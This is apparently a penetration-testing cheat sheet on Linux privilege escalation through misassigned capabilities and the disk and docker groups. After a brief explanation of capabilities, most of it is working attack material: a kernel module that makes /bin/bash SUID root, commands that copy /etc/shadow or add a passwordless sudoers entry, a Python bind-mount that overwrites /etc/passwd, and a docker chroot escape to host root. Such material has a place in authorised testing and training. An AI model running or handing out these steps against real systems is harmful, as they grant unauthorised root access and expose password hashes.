Capabilities

Description

Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve. Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions.

Usage

CAP_DAC_READ_SEARCHCAP_SYS_MODULECAP_NET_RAWCAP_DAC_OVERRIDECAP_SYS_ADMINCAP_SYS_PTRACE

The CAP_DAC_READ_SEARCH capability is set on /bin/tar binary. As a result, the current user can bypass file read permission checks and directory read/execute permission checks.

tar -cvf /tmp/shadow.tar /etc/shadow

The CAP_SYS_MODULE capability is set on /bin/kmod binary. As a result, the current user can insert/remove kernel modules in/from the kernel of the host machine.

kernel_module.c

#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("QU35T");
MODULE_DESCRIPTION("LKM Bash SUID");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/chmod","u+s","/bin/bash", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

static int __init shell_init(void) {
        return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit shell_exit(void) {
        printk(KERN_INFO "Exiting\n");
}

module_init(shell_init);
module_exit(shell_exit);

Makefile

obj-m +=kernel_module.o

all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Execute the new module

make
insmod kernel_module.ko

The CAP_NET_RAW capability is set on /usr/sbin/tcpdump binary. As a result, the current user can capture traffic on network interfaces.

tcpdump -ni ens3 host $IP

The CAP_DAC_OVERRIDE capability is set on /usr/bin/vim.basic binary. As a result, the current user can bypass permission checks and can read/write any file.

vim /etc/sudoers

qu35t ALL=(ALL) NOPASSWD:ALL    

The CAP_SYS_ADMIN capability is set on /usr/bin/python2.7 binary. As a result, the current user can mount/umount filesystem.

cp /etc/passwd ./
openssl passwd -1 -salt root password

from ctypes import *

libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)

MS_BIND=4096
source="/home/qu35t/passwd"
target="/etc/passwd"
filesystemtype="none"
options="rw"
mountflags=MS_BIND

libc.mount(source,target , filesystemtype, mountflags, options)

The CAP_SYS_PTRACE capability is present in the permitted set of /usr/bin/python2.7 binary. As a result, the current user can attach to other processes and trace them.

Groups Privesc (GID)

DiskShadowDocker

debugfs /dev/sda

ls /root

cat /etc/shadow

docker images
docker run -it --rm -v /:/mnt ubuntu:18.04 chroot /mnt bash
ls /root

References

• AttackDefense
• Hacktricks